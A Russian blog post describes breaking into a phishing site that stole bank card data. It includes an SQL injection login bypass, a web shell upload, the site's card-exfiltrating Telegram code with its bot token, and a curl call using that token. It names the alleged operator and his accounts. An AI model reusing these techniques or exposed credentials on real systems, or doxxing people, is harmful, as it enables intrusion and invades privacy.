Как я хакера ловил +284



Аннотация


Каждый из нас может стать жертвой злоумышленника, но иногда хищник и добыча меняются местами.

Это краткая история о том, как неумелое использовании технологий может привести к раскрытию личности. Статья будет полезна как юным хакерам, желающим получить «легкие деньги», так и тем, кто хочет их поймать.

Введение


Одним февральским вечерком я был занят поиском места для романтичного свидания со своей возлюбленной. Через какое-то время мое внимание привлек сайт milleniumfilm.ru, не доступный в настоящее время. Сайт предоставлял услуги аренды небольших кинозалов для частного просмотра. Красивые картинки, умеренные цены, есть онлайн поддержка, одно но: данные банковской карты предлагалось ввести на не защищенной странице этого же домена. Насторожившись, я написал в техподдержку сайта, и мошенники не заставили себя долго ждать — поняв, что я достаточно технически грамотен послали меня на 3 буквы. Конечно, мошенникам нет смысла тратить на меня время, но зачем так грубо? — В любой ситуации нужно оставаться Человеком.

С отзывами о сайтах такого же плана можно ознакомиться тут: zhaloba-online.ru. Некоторые из них даже до сих пор работают.

Взлом


Чувствуя вселенскую несправедливость, с целью установления личности злоумышленника и пресечения его деятельности, я принялся изучать сайт на предмет уязвимостей. Ткнув пальцем в небо Первый введеный адрес привел меня в панель администратора, который вежливо просил указать «Логин» и «Пароль».

Скриншот

Первая же попытка SQL-инъекции Первый пришедший в голову пароль

1' or '1

дал мне доступ к настройкам сайта.

Скриншот.
Данный скриншот был сделан после атаки, потому имя пользователя такое говорящее.

Сайт создателя данного творения Gelloiss.ru красовался на первой же странице. Особенно интересным оказался раздел «Банковские карты» — там отображались все введенные данные: фамилия и имя держателя карты, номер карты, срок действия, cvc2 и код подтверждения из смс.

Большой скриншот. Часть данных закрашена.

Как это работает.
Получив реквизиты банковской карты, злоумышленник делает запрос на перевод средств с карты и перенаправляется платежной системой на страницу 3D-secure, где нужно ввести код из смс. Код приходит в смс на телефон жертвы, который вводит его в форме сайта. Получив код из смс, мошенник вводит его на странице 3D-secure подтверждая транзакцию. Вся эта схема требует неотлагательный действий самого мошенника, что наводит на мысль, что сайт должен быстро уведомлять о наличии жертвы.

На странице «Настройка фильмов» была достаточно простая форма для формирования тексто-графических блоков. Функция загрузки картинки не фильтровала контент загружаемых файлов, что навело на мысль о возможности залить php-shell. Шелл успешно залился в /images/, откуда я его скопировал в корень сайта под названием login.php. Получив доступ к консоли, я принялся изучать внутренности сайта.

Список файлов.

Среди содержимого меня привлек файл telegram.php.

Код.
$ cat telegram.php
<?
function send_mess($text) {
  $token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
  $mess = $text;
  $chat = "-302359340";
  /*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
  file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}

PHP скрипт содержал в себе токен телеграм-бота и отправлял сообщения в чат при вызове функции send_mess. Поискав по коду сайта стало ясно, что именно с помощью телеграм-бота злоумышленнику отправляются данные карт, смс код.

grep
./cart.php:22:send_mess("Имя клиента: ".$name."%0D%0AEmail: ".$email."%0D%0AТелефон: ".$phone."%0D%0AДата посещения: ".$date."%0D%0A"."Время: ".$time."%0D%0AГород: ".$city."%0D%0AСумма: ".$sum."%0D%0AСписок заказанных услуг: ".$services."%0D%0AIP: ".$ip."%0D%0AЗабанить: ".$link_ban_ip);
./pay/ms.php:21:  send_mess("Сумма: ".$sum."%0D%0AИмя владельца карты: ".$name."%0D%0AНомер карты: ".$num."%0D%0AСрок годности, месяц: ".$month."%0D%0AГод: ".$year."%0D%0Acvv: ".$cvv);

Что ж, у нас есть токен телеграм-бота, chat_id, адрес создателя сайта на котором красуется skype «ura7887» и telegram «Gelloiss» (раньше telegram не был указан, потому для того чтобы убедиться что telegram-аккаунт принадлежит владельцу сайта я использовал наживку).

Скриншот с сайта gelloiss.ru

Выясним, кто создал чат, в который бот отсылает сообщения.

curl
$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}

Как видно создатель чата имеет такой же username как и сайт создателя — «gelloiss».

Поиск


Помните: интернет ничего не забывает! Поиск по ключевым словам: «gelloiss», «ura7887», привел меня на страницу вконтакте Юрия Искры, где указан как сайт «Gelloiss.ru», так и skype «ura7887».

Скриншот.

А вот тут: vk.com видно, что данным скайп логином Юрий пользовался еще 6 лет назад, когда ему было 14 лет.

Скриншот.

А так же тут anime.anidub.com.

Скриншот.

Так же можно найти сообщение на форуме хакеров blackhacker.ru, с предложением продажи фишингового сайта.

Скриншот.


Проверка telegram


На момент начала истории, на сайте Gelloiss.ru не был указан логин telegram, потому мне нужно было связать владельца telegram-аккаунта с владельцем сайта или страницей вконтакте. Для этого я создал некий маркер, который владелец telegram-аккаунта должен будет разместить у себя.

shell
$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8  -

Далее я написал в telegram и представившить потенциальным заказчиком предложил пройти проверку: попросил разместить маркер a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 на странице вконтакте.

Скриншот диалога telegram

Заключение


Лично у меня не осталось сомнений, что страница вконтакте принадлежит злоумышленнику. На момент взлома сайта, в базе данных было не менее 100 различных номеров карт, а к моменту закрытия сайта еще +100.

В заключение давайте посмотрим, где учится наш «герой». Это легко определить посмотрев где учатся его «друзья по вузу» на странице вконтакте.

Большой скриншот

Продолжение следует


Мне удалось получить доступ к сообщениям, которые отсылает бот. Масштабы бедствия поражают: за 3 месяца телеграм-бот отослал примерно 13 тысяч сообщений. Даже если предположить, что всего-лишь пятая часть полученных данных валидна, то список пострадавших превысит 2 тысячи человек. Хакер работает не один, а с сообщниками, которые завлекают клиентов и помогают с переводом средств. На данный момент злоумышленники получают паспортные данные, телефоны и номера карт с сайта moneyonline.world.

Update 2019-04-21: Поскольку пользователь gelloiss убеждает в комментариях, что не был в курсе, для каких целей сайт будет использоваться, привожу фрагмент дампа сообщений telegram:
Скрытый текст
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message='Короче нужен сайт по «переводу карты на карту без комиссии» естесственно он должен высылать данные карты и код подтверждения мне', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ? это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Вы можете помочь и перевести немного средств на развитие сайта



Комментарии (268):

  1. yurybx
    /#20054442 / +2

    Отличная работа! Остаётся теперь передать информацию органам, пусть выполнят свою работу.

    • pallada92
      /#20054468

      Я задумался, а тот, кто взламывает хакера, может тоже быть обвинен во взломе или соучастии? Тем более автор скачал дамп, содержащий данные этих карт. Или это квалифицируется как самооборона?

      P.S. Что-то SQL инъекция слишком очевидная. Что если это ложная панель управления?

      P.P.S. А что если автор этого сайта хотел подставить gelloiss? Зачем в админке с очевидной инъекцией гордо указывать автора? Если я не путаю, из статьи понятно, что Юрий Искра доказал, что он владелец gelloiss.ru, но не сайта milleniumfilm.ru. (хотя gelloiss создал telegram-чат, можно ли подделать создателя чата?)

      • SaturnTeam
        /#20054502 / +1

        По моему тот кто взламывает хакера тоже может быть обвинен. Если например самостоятельно схватить преступника который тебя обокрал вчера, то можно самому сесть по статье за ограничение свободы человека. Взломы должны проводиться лишь соответствующими органами.

        • olartamonov
          /#20054516 / +1

          Если рассматривать по УК РФ, то там есть нюанс — уголовным преступлением является не любой взлом, а «если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации».

          То есть вот сохранять к себе на компьютер дамп сайта не стоило однозначно ни при каких условиях.

          • cyrillpetroff
            /#20054978

            А причем тут УК РФ, если Искра из Харькова? Скорее всего, ворует данные только у пострадавших с РФ, пользуясь «небратскими» отношениями сейчас у братских народов.
            Надо, чтобы чел с Украины его за жабры взял…

            • saboteur_kiev
              /#20056764

              Люди которые воруют, не делят жертв на своих, чужих, у которых это лишние карманные или последние до следующей зарплаты. Они делят всех на «я и остальные лохи», а времена Робин Гудов давно закончились.

              IMHO надо было в киберполицию это все слить.

        • Rsa97
          /#20054640 / +7

          Если например самостоятельно схватить преступника который тебя обокрал вчера, то можно самому сесть по статье за ограничение свободы человека.
          Из постановления Пленума ВС РФ:
          Право на задержание лица, совершившего преступление, имеют не только уполномоченные на то представители власти, но и иные лица, в том числе пострадавшие от преступления, или ставшие его непосредственными очевидцами, или лица, которым стало достоверно известно о его совершении. [...] Превышение мер, необходимых для задержания лица, совершившего преступление, влечет за собой уголовную ответственность только в случаях умышленного причинения смерти, тяжкого или средней тяжести вреда здоровью. Если лицу, совершившему преступление, при задержании был причинен вред меньший, чем это предусмотрено в части 2 статьи 114 УК РФ, действия задерживавшего лица не образуют состава преступления.

          • edogs
            /#20054878

            Нас в этой статье всегда смущал нюанс.
            По УК есть презумпция невиновности, до решения суда никакое деяние преступлением не является.
            Поэтому сама фраза «задержать лицо совершившее преступление» формально абсурдна, ведь за что бы его не задержали — преступлением это будет только после решения суда.

            • Rsa97
              /#20054910

              Несколько не так.
              УК РФ, ст. 14.1:

              Преступлением признается виновно совершенное общественно опасное деяние, запрещенное настоящим Кодексом под угрозой наказания.

              Для признания деяния преступлением не требуется решения суда. Суд определяет виновность обвиняемого в совершении преступления и меру наказания в случае вины.

              • edogs
                /#20054926

                Но Вы же просто расшифровали термин преступление, доказывать что было совершено «виновно совершенное общественно опасное деяние, запрещенное настоящим Кодексом под угрозой наказания» ака «преступление» все равно надо.

                Да и УПК так же думает

                УПК РФ Статья 73. Обстоятельства, подлежащие доказыванию

                "«1. При производстве по уголовному делу подлежат доказыванию:
                »«1) событие преступления (время, место, способ и другие обстоятельства совершения преступления);


                А вот полиция (согласно УПК) может задерживать лишь по подозрению в совершении
                УПК РФ Статья 91. Основания задержания подозреваемого

                »«1. Орган дознания, дознаватель, следователь вправе задержать лицо по подозрению в совершении преступления

                • rexen
                  /#20061428

                  Ну так чё получается? Если суд потом докажет, что преступник подозреваемый совершил преступление, то «активистам» — «всем спасибо, все свободны». Если же будет вынесено оправдание, то...?

            • mayorovp
              /#20058246

              Зато после решения суда оказывается, что деяние было преступлением всегда, а не стало таковым только что. Иначе абсурдной была бы уже фраза «преступление совершено».

      • olartamonov
        /#20054512 / +1

        Я задумался, а тот, кто взламывает хакера, может тоже быть обвинен во взломе или соучастии?


        Формально — да. Ст. 272 ч. 1 УК РФ, сохранять дамп найденного к себе на компьютер не стоило совершенно точно.

        Или это квалифицируется как самооборона?


        Самооборона — это когда здоровью или жизни что-то непосредственно угрожает. А в данном случае правильным порядком действий с точки зрения УК примерно любой страны является обращение потерпевших в органы (и очевидная проблема — потерпевшим является тот, у кого деньги уже украли, при этом в силу специфики преступления найти других потерпевших трудно).

        • yarkov
          /#20054720

          Если лицу, совершившему преступление, при задержании был причинен вред меньший, чем это предусмотрено в части 2 статьи 114 УК РФ, действия задерживавшего лица не образуют состава преступления.

          То есть я могу задержать воришку и лещами аккуратно его положить на землю до приезда полиции? И мне ничего не будет, если я не сверну ему хобот нечаянно?

          • pyrk2142
            /#20055022

            Тут существует потенциально крайне неприятная тонкость: если воришка получил вред здоровью средней тяжести при задержании, либо получил этот вред после, но убедил полицию/экспертов, что получил их во время задержания, то вы очень рискуете. Особенно, если воришка выглядит грустно, а окружающим его жалко.

            • seri0shka
              /#20056970

              Тут ещё одна тонкость- что посчитают вредом здоровью средней тяжести? Когда мой кум (на тот момент ещё просто коллега) попал в больницу после избиения, на его телесные повреждения «средней тяжести» нельзя было взглянуть без слёз. Но зная наши органы… могут ведь и наоборот перевернуть.

              • Rsa97
                /#20057034

                Есть приказ Министерства здравоохранения, устанавливающий «медицинские критерии квалифицирующих признаков тяжести вреда здоровью». Оценку производит судмедэксперт.
                Если кратко, то лёгкий вред — нетрудоспособность до 21 дня и потеря до 10% общей трудоспособности.

                • ivanrt
                  /#20067834

                  10% это перманентно или на ограниченный период? Интересно а как можно оценить трудоспособность?

                  • Rsa97
                    /#20068116

                    Это перманентно. Оценка производится по специальным таблицам в приложении к тому же приказу. 10% это, например, черепно-мозговая травма, повлекшая за собой значительно выраженные вегетативные симптомы (тремор век и пальцев рук, высокие сухожильные рефлексы, вазомоторные нарушения и др.).

      • misery-hacker
        /#20054754 / +2

        P.P.S. А что если автор этого сайта хотел подставить gelloiss? Зачем в админке с очевидной инъекцией гордо указывать автора? Если я не путаю, из статьи понятно, что Юрий Искра доказал, что он владелец gelloiss.ru, но не сайта milleniumfilm.ru. (хотя gelloiss создал telegram-чат, можно ли подделать создателя чата?)

        Такой вариант тоже возможен, но близок к невероятным. Создателя чата подделать невероятно сложно, но можно украсть сам телеграм аккаунт. Сообщения в чате есть как минимум с января, а значит украденный телеграмм аккаунт на сайте более 3х месяцев. (Хотя я то знаю, что он там [на сайте] появился совсем недавно). Напомню, что владелец телеграмм аккаунта разместил маркер на сайте gelloiss.ru

        Если продолжить рассматривать маловероятные сценарии, то скорее кто-то много-много лет пытается подставить Юрия: писал от его имени различные сообщения на хакерских форумах, указывая для связи его скайп.

        • solver
          /#20054788

          Ну почему сразу подставить Юрия?
          Вам знакомо поняте «кража личности»?
          Просто кто-то мог взять себе данные реального человека и творить сови делишки…

    • 200sx_Pilot
      /#20054476 / +2

      Ну т накажут ТС по всей строгости закона за взлом, за обман доверчивого мошенника, за добычу персональных данных, приклеют ему же фишинг на основании найденных НА ЕГО компьютере данных банковских карт и иной конфедициальной информации…

      Я задумался, а тот, кто взламывает хакера, может тоже быть обвинен во взломе? Или это квалифицируется как самооборона?

      Скорее всего, будет квалифицировано как превышение пределов необходимой обороны.

    • QtRoS
      /#20054576 / +1

      Кажется, добытые незаконно доказательства таковыми не являются. Поэтому привлечь внимание можно, но гарантий никаких нет, хотя наводка знатная.

      • ClearAirTurbulence
        /#20054598 / +4

        Мы не в Америке. Но гарантии есть — что сядет обратившийся.

      • olartamonov
        /#20054624 / +1

        Для начала, посторонние граждане вообще добычей доказательств не занимаются и заниматься не могут. Максимум, что они могут — в соответствии со ст. 140 ч. 1 УПК РФ сообщить «о совершенном или готовящемся преступлении».

    • misery-hacker
      /#20054682 / +3

      Знакомый человек близкий к органам считает, что в виду сложных отношений с Украиной, подозреваемому ни чего не угрожает. Гораздо действенней может оказаться социальное давление, или действия службы безопасности банка (клиенты которого пострадали). В любом случае, без заявлений пострадавших — делу ход не дать.

      • pallada92
        /#20054696

        Я не очень понимаю, как вообще работают мошеннические схемы с выводом денег при онлайн-оплате картами. Разве при оплате картой они не перечисляются со значительной задержкой, во время которой клиент может оспорить платеж? А если много клиентов требуют вернуть деньги, банк должен вообще заблокировать счет. Плюс для снятия денег, наверное, нужно предъявить кучу документов.

        • walkman7
          /#20054734 / +1

          А где гарантии того что деньги выводятся на счет? Вот пару месяцев назад, открыл для себя новый вид обналички, скамер после получения данных производит обмен фиата на крипту в обменнике с автообменом. И что сдесь блокировать? Целый блокчейн? Обменник?

        • AlexanderS
          /#20056338

          А вы пробовали когда-нибудь отменить сделанный платёж? В США это можно сделать в течение месяца. У нас же — только по личному походу в банк и на это отводятся только сутки.

          • Speakus
            /#20056570

            Я пробовал. Купил игру в стиме помеченную что она с русским — но она оказалась с русским только для Windows. Сам стим хотел вернуть фантики на их счету — но я не планировал никаких покупок игр в стиме — поэтому этот вариант меня не устроил. Написал в поддержку карты и приложил переписку со стимом. Деньги вернули за 30 дней. Никакого посещения офиса не потребовалось. Если бы отказались можно было бы вернуть через мастеркард приложив переписку с банком.

            • AlexanderS
              /#20056704

              Что за банк, если не секрет?

              • Speakus
                /#20056866

                Кажется это была карта «кукуруза». Но более я её рекомендовать не могу.

                по другим причинам
                1. Как-то у них закончился «процент на остаток» и мне пришлось ехать в другой город, чтобы забрать свои деньги — банк который держал эти деньги не хотел мне удалённо возвращать их на кукурузу (Промсвязьбанк). Естественно на те полгода пока я собирался посетить их офис проценты никто не начислил.
                2. Поменял паспорт и их поддержка (через «связной») долго не могла правильно обработать моё заявление — пополнить карту я не мог довольно долго из-за этого.

            • 9660
              /#20057880

              Купил как-то игру в стиме (с полгода назад), деньги списали. Игра оказалась для виндовз, в поддержке стима завел по шаблону тикет, через день вернули деньги в карту. Давно ваш случай был?

              • Speakus
                /#20060640

                Очень давно — может 3-5 лет назад

          • Gelloiss
            /#20056706 / +2

            Отменял покупку игры в google play. При чем, отменил я ее дня через два, после покупки. Вообще, на кнопку нажал только ради интереса, ибо «как это так, я деньги отдал, игра у меня, а теперь можно обратно вернуть?». Ну и игра удалилась, а деньги вернулись)

          • me21
            /#20058868

            Оплатил как-то раз билайновский интернет, деньги почему-то на счёт не пришли (один раз такое было). Да, пришлось сходить лично в банк, но лимита в сутки нет. Написал заявление, через какое-то время деньги вернули. Процедура, строго говоря, не банковская, а платёжной системы (чарджбэк).

          • VSOP_juDGe
            /#20059798 / +1

            Тинькофф мне пару раз возвращал деньги (один раз ошибочно два раза списали в магазине, воторой раз онлайн-мошенники продали левый ключ к игре) по телефонному обращению. Никаких суток и походов в банк.

            • Vilgelm
              /#20060800

              У меня была ситуация когда Aliexpress по какой-то причине заморозил заказ и аккаунт. Писал в чат Тинькофф, приложил скриншоты — они создали обращение, которое провисело недели две и деньги вернулись. Однако уверенности в том, что это сделал банк, а не сам Али у меня нет, по срокам если честно больше подходит под возврат с Али. Тем не менее такая возможность действительно есть.

        • Speakus
          /#20056558 / +1

          Однозначно проблема будет вернуть если перевод был физлицу.

        • kimisa
          /#20058154

          Была ситуация такого рода. Подруга играет в он-лайн игру и периодически делает покупки. В один момент ей посыпались смс со списанием денег по аналогичной услуге, но она на данный момент не едлала никаких покупок. Ладно хоть денег на этой карте было 2000 руб.
          Но ни обращение в гугл, ни в банк не вернули эти деньги. Типа нет доказательств, что эти платежи мошеннические.

        • Vilgelm
          /#20060782 / +1

          Насколько я понимаю в статье речь идет о card2card переводах, а их оспорить довольно таки сложно (хотя несколько лет назад даже закон принимали, по которому в течении суток любую транзакцию можно оспорить). Но техническая возможность у банка есть, например я один раз пытался перевести 30к через card2card, банк сам молча сначала заморозил, а потом отменил транзакцию (правда есть нюанс, c2c сервис принадлежал банку, который выпустил карту отправителя).

          А вообще по правилам Visa и MC можно вообще в течении 60 дней или около того вернуть деньги. Это называется чарджбэк. Но процедура достаточно сложная и я не думаю что она распространяется на что-то, кроме операций покупок (а c2c перевод такой операцией не является).

    • Stepan555
      /#20055478 / -2

      В бантустане этого Юрия Искры «органы» разве что в долю войти могут. Да ещё «звезду хероя» выдать за «подвиг». Хероям слава!

      • Xander_Vi
        /#20056344 / +1

        Вот человека заминусовали, а я, как житель Украины, поддержу его слова — с большей вероятностью наши представители правоохранительных органов будут крышевать такой прибыльный бизнес (согласно данных, указанных в статье — 13 тысяч сообщений и 2000 предполагаемых жертв), чем бороться с ним.
        К сожалению, таковы реалии нашей страны — зарплата сотрудников киберполиции далека даже от зарплаты джуна в нормальной аутсорс компании, так что выживают, как могут (я не одобряю и не поддерживаю такое положение дел, просто констатирую факт).

        Но на счет «звезды хероя» — это, конечно, перебор) Всё будет сделано максимально тихо и незаметно.

        • UnrealQW
          /#20057596

          Но таким образом прибыль от незаконных действий будет размазана и на других участников. А, значит, разработчик получит меньше денег (не говоря уже о других проблемах при работе с коррумпированной полицией). И в итоге хакер может решить, что доход слишком мал, чтобы так мараться; найдет нормальную работу.

          • SantaCluster
            /#20062894

            сдаётся мне, попытка "соскочить" может оказаться дороже продолжения делиться

        • saboteur_kiev
          /#20060296

          1. я, как житель Украины, скажу что сайт никаким образом не определяет житель какой страны спалил данные своей карточки.

          2. Опять же зарплата сотрудников киберполиции невелика, они тем более не будут разбирать что да как. Но для возбуждения уголовного дела, нужно чтобы в полицию обратился постардавший. Обратится — проведут расследование. А завершенные дела киберполиции очень нужны, тем более такие, где нарушитель не сын очередного депутата.

          • Rsa97
            /#20060402 / +1

            Но для возбуждения уголовного дела, нужно чтобы в полицию обратился постардавший.
            То есть, дело об убийстве не заводится, пока пострадавший не напишет заявления?

            • saboteur_kiev
              /#20060892 / +1

              Ну если на улице лежит мертвый человек, обычно дело об убийстве сразу не заводится.

              Сперва вызывается скорая, а дело об убийстве — если есть подозрение на убийство, а не на инфаркт. Так и тут — киберполиция вообще не знает о существовании сайта.
              Я может не совсем корректно сказал, что только пострадавший может обратиться. Но в общем случае да, без пострадавшего будет сложно понять что расследовать.

              В конкретном нашем случае, есть контакты с карточек — можно передать их, пусть полиция свяжется.

  2. jevius
    /#20054560

    Он не хакер, а малолетний дебил. Всего его хаки — соц. инженерия. На бутылку

    • misery-hacker
      /#20054626 / +3

      Мне казалось, habrahabr не место для подобных высказываний.

    • edogs
      /#20054864 / +3

      Он не хакер, а малолетний дебил. Всего его хаки — соц. инженерия
      Митник вряд ли согласился бы с тем, что «соц.инженерные хаки» это признак дебилизма. Почитайте его «искусство обмана», если не читали.

      • jevius
        /#20055162 / -1

        Обманывать людей уже признак не очень умного человека. А если ты хорош на выдумки того, как именно обмануть, это не показатель ума.

        • alsoijw
          /#20056578 / +1

          Обманывать людей уже признак не очень умного человека.
          А вы умеете обманывать? Нет? Для социальной инженерии тоже знания нужны и на дороге они не валяются. А для того чтобы обманывать умных, нужно быть ещё умнее. К тому же умея защищаться от обманы частично учишься и обманывать

        • fotofan
          /#20056686

          По вашей логике разведчики, актёры и даже врачи не блещут умом?

        • saboteur_kiev
          /#20056786

          Хм.На текущий момент, самые крупные в денежном смысле преступления были сделаны при помощи обмана и социальной инженерии.

        • Dioxin
          /#20058454

          Обманывать людей уже признак не очень умного человека
          Возможно вы имели ввиду что строить свою жизнь на обмане это не совсем умно?
          Тогда да, это так. Хорошая репутация это самая хорошая стратегия.
          Но! Элементы обмана присутствую везде в какой-то мере, без этого никуда.
          Думаю Митник врет напропалую, пытаясь найти брешь в системе безопасности компании которая заказала ему аудит.

        • S-trace
          /#20061806

          >Обманывать людей уже признак не очень умного человека.
          Что поделать, если сейчас проще обмануть человека, чем машину?
          Вот и выкручиваются как могут, «хакеры».
          Хотя, по мне — им таким нужно другое название придумать. Как вам «шулеры»?

          • alsoijw
            /#20061834

            Как вам «шулеры»?
            Лгуны же! То юзер агент подменят, то под видом ввода команды код возврата перезапишут, то vpn под сайт замаскируют, то пароль себе придумают, то админом представятся, а то и вообще заказчиком!

    • jevius
      /#20055736

      Я правильно понимаю что хабрасообщество осуждает критику преступлений?

      • nidalee
        /#20055872

        Ваши комментарии не несут смысловой нагрузки, просто эмоции в воздух. Лично мне не очень интересно, что вы думаете об этом человеке. Я вас не минусовал по понятным причинам.

        • jevius
          /#20055890

          Мальчика назвали хакером, я сказал что он не является хакером. Всё. Словил кучу минусов. (Куча примеров, где в комментах пишут свои эмоции пользователи, и все ок. Но если ты пишешь не про хорошие эмоции — кик. Что ж)

          • alsoijw
            /#20056582

            я сказал что он не является хакером.
            У этого слова есть несколько смыслов. И смысл который в него вкладывает журналист отличается от смысла, который в него вкладывали системщики из 80. Само по себе слово ничего не значит.

          • saboteur_kiev
            /#20056790

            Мальчика назвали хакером, я сказал что он не является хакером.


            Он не хакер, а малолетний дебил. Всего его хаки — соц. инженерия. На бутылку

            compare string — result false.

            • S-trace
              /#20061822

              Ну да, давайте ещё будем выискивать места, где вместо короткого тире длинное поставилось из-за дрогнувшего пальца и двух минусов подряд в тексте)
              Смысл высказываний одинаков, так что true == Thoughts.compare(thoughFirst, thoughSecond);

      • edogs
        /#20056020 / +1

        Я правильно понимаю что хабрасообщество осуждает критику преступлений?
        Вы считаете что «критикуя преступление» можно писать что угодно и это должно приниматься на ура? Мы Вас не минусовали, но тем не менее считаем что Вы не правы во многом, разберем по пунктам
        1) «Он не хакер» — в современной терминологии хакер это «компьютерный злоумышленник», т.е. Вы по сути говорите что он «не компьютерный злоумышленник» Где тут критика? Да пес с ней с критикой, где логика?
        2) «Он малолетний» — даже если так, то почему Вы это произносите в негативном ключе, разве есть что-то позорное в том что бы быть малолетним?
        3) «дебил» — термин дебил это объективный показатель низкого IQ, условно говоря. У Вас не только нет оснований так заявлять, но и называя его так, Вы косвенно называете людей которых он обманул еще бОльшими дебилами — двойной фэил.
        4) «Всего его хаки — соц. инженерия» — это уже писали, но еще раз — соц.инжинерия это тоже хакерство.
        5) Мало того, Вы вообще не критикуете преступление, вся Ваша фраза направлена в адрес человека, а не его деяния.

      • fukkit2
        /#20057046

        Детям присущ эгоцентризм и правовой нигилизм. Для них упрощение мира до "+" и "-", и отражение его через собственную недоразвитую эмоциональную сферу является наиболее естественной формой реакции вообще на всё.

      • engine9
        /#20058326

        Не путайте объективную критику и личное осуждение.

    • saboteur_kiev
      /#20056778

      Некий (возможно даже хакер?) Кевин Митник, регулярно пользовался социальной инженерией, и даже утверждал, что «от человеческой глупости нет патча».

  3. daniillnull
    /#20054670 / +6

    Особенно забавляет, как он в 2016 на своем сайте писал про свое отношение к «грязным проектам».
    image

    • TimsTims
      /#20054868 / +1

      > свое отношение к «грязным проектам»

      Настройка, доработка, установка, копирование
      Обычно нормальным людям стыдно такое говорить, а этому нет. Значит он изначально был готов на то, чтобы у кого-то что-то украсть. Плюс очень странно, что он вообще на этом акцентировал внимание, как будто тебя сразу же после публикации каждый день засылают предложениями о работе на черный рынок…

      • fantik22
        /#20055544

        как будто тебя сразу же после публикации каждый день засылают предложениями о работе на черный рынок

        Засылают… Ещё как! Сам лично с этим сталкивался. После регистрации на одной фриланс бирже разместил своё резюме, спустя день на почте было около 7-ми писем с предложениями аля «Нужен веб-девелопер для разработки фишинг-сайта» и не сказал бы что ценник сильно отличался от белых проектов, в некоторых случаях даже был меньше

  4. 1c80
    /#20054692 / +2

    Не очень понятно, Юрику заказали сайт и он его сделал, отдал заказчику и поддерживает,
    какие претензии к нему могут быть?
    Он ведь не владелец сайта milleniumfilm.ru, а у что там заказчик разместил и для чего использует, не его проблемы.

    • olartamonov
      /#20054706 / +2

      А это уже «деяния, совершенные группой лиц по предварительному сговору». За них ещё больше дают.

      • edogs
        /#20054848 / +2

        Дело в том, что не просто «группой лиц», а «по предварительному сговору». И сговор это не просто заказ на разработку сайта, а именно сговор с умыслом совершить преступление. Иначе можно было бы сажать всех — производителя компьютера, платного репетитора, хостера и т.д… — всю группу лиц которая хоть как-то участвовала.

        Мало того, если подумать, то из поста не следует что сайт мошенник. Просит ввести данные карты? Ну и? А кто при оплате не просит?
        Букинг, например, тоже просит ввести цвв у себя на сайте и мало того, данные карт передает отелям прямым текстом. habr.com/en/post/442378
        Знаем как минимум 2 реальных агрегатора/поисковика для покупки авиабилетов где сайт поступает так же, просит ввести данные карты у себя на сайте, один тоже телеграмм ботом их отсылает.
        ссл сертификата нет? Тоже не признак мошенничества. А то что автора послали на три буквы — опять же, обидно, но не мошенничество.
        Т.е. это все конечно bad practice, может быть даже АК за обработку ПД, но никак не УК — в рамках данной доказательной базы.
        Вот если бы автор пробил по адресу «кинотеатр» и обнаружил бы что его там нет или что сайт не имеет к нему отношнеие — это был бы аргумент (если кинотеатр реально есть и это его владелец, то в чем нарушение?), опять же не финальный, т.к. для финального необходимо еще доказать материальный ущерб (создатель сайта может отмазаться тем, что он пишет дипломный проект о легковерии идиотов в интернете).

        На случай если кто-то бросился писать гневный коммент на тему что мы защищаем мошенника — нет, мы как раз объясняем почему поспешные обвинения могут оказаться пшиком и чуть что развалиться и что надо их строить на более сильной базе.

        Что касается возможности притянут ТС за «взлом», то статья 12 и 14 гк в принципе дают ему определённую свободу действий (самозащита прав), т.к. он действовал в целях пресечения правонарушения и не создал дополнительного ущерба.

        Ну и отдельно, конечно, поражает то, что все это вообще возможно. Вроде везде проверка паспортов, даже если ты копейки на центы поменять хочешь, к вай-фаю без номера телефона не подсоединиться, а мошенники спокойно заводят какие-то подставные счета, выводят через них деньги и остаются безнаказанными. Как так? Видимо, пока они не финансируют антиправительственные митинги, особого интереса они не вызывают.
        Sabubu дело в том., что карточная система изначально пришла из сша/европы, где в случае мошенничества банк/платежная система без проблем возмещает ущерб. Для россии это тоже отчасти работает, только немного через ж-пу, но в принципе через визу/МС вполне можно вернуть мошеннический платеж в возврате которого откажет банк. В общем by design мошенничество никого не парило, т.к. деньги клиентам возвращались.
        Еще нюанс в том, что в ряде случаев оплата вообще совершается без участия банка в момент оплаты, т.н. оффлайн платежи. В банк данные об оплате приходят пост-фактум и он его в принципе задержать не может.
